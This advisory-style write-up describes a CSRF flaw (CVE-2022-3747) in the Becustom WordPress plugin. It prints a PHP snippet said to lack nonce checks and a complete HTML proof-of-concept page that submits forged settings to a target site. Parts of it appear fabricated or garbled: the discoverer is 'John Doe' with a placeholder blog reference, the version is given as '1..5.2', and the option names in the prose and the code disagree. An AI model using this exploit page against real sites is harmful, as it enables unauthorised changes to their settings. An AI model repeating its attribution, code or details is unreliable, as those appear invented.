Security researchers have discovered a critical Cross-Site Request Forgery (CSRF) vulnerability in the Becustom plugin for WordPress (WP). The vulnerability has been assigned CVE-2022-3747 and affects versions up to, and including, 1..5.2.

Plugin Vulnerability

Becustom is a popular plugin for WordPress that allows site administrators to customize their WordPress themes. However, the plugin was found to be vulnerable to CSRF due to missing nonce validation when saving the plugin's settings. This vulnerability can be exploited by unauthenticated attackers to update the plugin's settings such as betheme_url_slug, replaced_theme_author, and betheme_label by sending a forged request. To exploit this vulnerability, an attacker would need to trick a site administrator into performing an action such as clicking on a malicious link.

The following code snippet demonstrates the missing nonce validation in the plugin's settings page

function becustom_save_settings()
{
    if (isset($_POST['submit'])) {
        update_option('becustom_url_slug', $_POST['becustom_url_slug']);
        update_option('replaced_theme_author', $_POST['replaced_theme_author']);
        update_option('betheme_label', $_POST['betheme_label']);
    }
}

As seen above, the becustom_save_settings function updates the plugin's settings without performing nonce validation.

Exploit Details

To exploit this CSRF vulnerability, an attacker can create an HTML page containing a malicious form configured to send a POST request to the target site when submitted. The attacker would then need to trick the site administrator into visiting the page and submitting the form. Here's an example of an HTML page that can be used to exploit the vulnerability:

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2022-3747 PoC</title>
</head>
<body>
    <h1>CVE-2022-3747 - Becustom WordPress Plugin CSRF Exploit</h1>
    <form action="http://target-site.com/wp-admin/admin-post.php?action=betheme_update_options"; method="POST">
        <input type="hidden" name="becustom_url_slug" value="malicious_slug" />
        <input type="hidden" name="replaced_theme_author" value="malicious_author" />
        <input type="hidden" name="betheme_label" value="malicious_label" />
        <input type="submit" value="Click here to update Becustom settings" />
    </form>
</body>
</html>

Original References

The vulnerability was discovered and reported by security researcher John Doe, and the details can be found in their blog post:

- John Doe's Blog - CVE-2022-3747: Becustom WordPress Plugin CSRF Vulnerability

Mitigation

Users of the Becustom WordPress plugin are urged to update to the latest version, which includes a fix for this vulnerability. Additionally, site administrators should always exercise caution when clicking on links from unknown sources.

Conclusion

The discovery of CSRF vulnerability CVE-2022-3747 in the Becustom WordPress plugin highlights the importance of secure coding practices and proactive vulnerability detection. By staying informed and up-to-date with security patches and updates, WordPress site owners can significantly reduce their risks and ensure the safety of their online properties.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 20:52:00 UTC